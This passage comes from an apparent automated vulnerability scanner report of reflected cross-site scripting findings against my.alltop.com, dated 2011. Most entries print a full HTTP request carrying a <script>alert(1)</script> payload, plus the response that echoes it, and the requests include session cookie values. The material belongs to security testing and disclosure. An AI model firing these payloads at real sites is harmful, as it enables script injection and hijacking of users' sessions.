Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h7ca05"><script>alert(1)</script>359e354c8be/%2522ns%253D%2522netsparker%25280x0001B8%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.145. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf340"><script>alert(1)</script>fc2ec1a21ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)cf340"><script>alert(1)</script>fc2ec1a21ae HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:49 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)cf340"><script>alert(1)</script>fc2ec1a21ae" method="post" accept-charset="utf-8">
...[SNIP]...

1.146. http://my.alltop.com/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee6f"><script>alert(1)</script>fbb94190503 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)?3ee6f"><script>alert(1)</script>fbb94190503=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:44 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/h/%2522ns%253D%2522netsparker%25280x0001B8%2529)?3ee6f"><script>alert(1)</script>fbb94190503=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.147. http://my.alltop.com/alpha/i ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001E8)</script> request parameter is copied into the HTML document as plain text between tags. The payload 73184<script>alert(1)</script>60e04424cf4 was submitted in the '"--></style></script><script>netsparker(0x0001E8)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i?'"--></style></script><script>netsparker(0x0001E8)</script>73184<script>alert(1)</script>60e04424cf4 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>73184<script>alert(1)</script>60e04424cf4" method="post" accept-charset="utf-8">
...[SNIP]...

1.148. http://my.alltop.com/alpha/i [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e70"><script>alert(1)</script>fd251c20445 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i13e70"><script>alert(1)</script>fd251c20445 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i13e70"><script>alert(1)</script>fd251c20445" method="post" accept-charset="utf-8">
...[SNIP]...

1.149. http://my.alltop.com/alpha/i [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89c3"><script>alert(1)</script>89c007470ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i?f89c3"><script>alert(1)</script>89c007470ef=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i?f89c3"><script>alert(1)</script>89c007470ef=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.150. http://my.alltop.com/alpha/i [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03f4"><script>alert(1)</script>3e50c6ccc8d was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000164)%3C/script%3Ec03f4"><script>alert(1)</script>3e50c6ccc8d HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:22 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:22 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:22 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000164)%3C/script%3Ec03f4"><script>alert(1)</script>3e50c6ccc8d" method="post" accept-charset="utf-8">
...[SNIP]...

1.151. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7bf9"><script>alert(1)</script>8cc8b9d0f4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3Cc7bf9"><script>alert(1)</script>8cc8b9d0f4c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:01 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3Cc7bf9"><script>alert(1)</script>8cc8b9d0f4c/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.152. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 966c7"><script>alert(1)</script>21fa30cad5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3C/style%3E%3C966c7"><script>alert(1)</script>21fa30cad5b/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:06 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3C/style%3E%3C966c7"><script>alert(1)</script>21fa30cad5b/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.153. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7863"><script>alert(1)</script>40d22640f71 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3Ce7863"><script>alert(1)</script>40d22640f71/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:11 GMT
